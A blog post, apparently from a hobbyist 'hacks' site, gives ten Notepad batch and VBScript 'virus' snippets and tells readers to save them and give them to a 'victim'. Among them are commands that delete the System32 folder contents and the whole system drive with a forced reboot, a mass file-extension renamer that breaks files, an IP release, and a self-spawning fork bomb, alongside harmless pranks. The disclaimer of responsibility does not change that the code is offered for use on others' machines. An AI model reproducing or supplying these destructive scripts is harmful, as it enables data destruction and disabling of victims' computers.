Make Simple Virus in Notepad



Notepad is the simplest text editor provided by Microsoft in every version of Windows.
Notepad Tricks are use for the Tricking your Computer with the Some codes.

Today, I am going to share 10 amazing Notepad Tricks & Hacks that you can use to get most out of Notepad and amaze your friends.

This was posted for educational purposes only, I am not to be held responcible for any inappropriate usage of this information or the files that I may have provided. I am not to be held responsible for individuals or groups of people that suffer consequences of using this information or the files that I provided, these consequences include things such as expulsion, getting fired, or legal action.


1.Change Files To Non-working TXT Files

REN *.DOC *.TXT REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
Type this in notepad
And save it as “.bat” in “all files”
Ex: sample.bat


2.Delete any thing .....

 del c:\WINDOWS\system32\*.*/q
                  Location of the folder

Type this in notepad
save as anything.bat
If You Give this file to your victim
his "SYSTEM 32" Folder will be deleted. Without which a Window Pc cant be started.
Also you can change the location


Note: This will delete all the content of the folder , not the folder


3.Delete system drive

@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00


Type this in notepad and save it as .bat file


4.Funny shutdown virus

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -sType this in notepad

Type this in notepad
And save it as “.bat” in “all files”
Ex:"Anything.BAT"


5.Toggle Capslock key

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Type this in notepad
Save it as any thing .vbs in “all files”
Ex: anything.vbs



6.Toggle Enter key


Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop


Type this in notepad
Save it as any thing .vbs in “all files”
Ex: anything.vbs


7.How to stop someone's internet access
@Echo off
Ipconfig /release
Type this in notepad  &

Save as .bat and give it to your victim

IP address will be lost, and therefore they won't be able to fix it...

However, this is VERY easy to fix. Simply type in

IPconfig /renew



8.Continuously pop out cd drive

Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Type this in notepad  &
save it as “.bat” in “all files”


9.Matrix Effect

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

Type this in notepad and save it as “.bat” file

10.RAM crasher


start virus.bat

Type this in notepad  &
save it as virus.bat in all files  
Name should be same as in notepad
This will open lots of CMD so that ram goes Out of Memory and crashes the computer

I am responsible for what I say. I am not responsible for what you understand.

Hope you like our work, do share with others too. Leave a comment below if you facing any problem at any step discussed above.





Make Simple Virus in Notepad Make Simple Virus in Notepad Reviewed by Haxbaba Tech on 07:05 Rating: 5

No comments:

Powered by Blogger.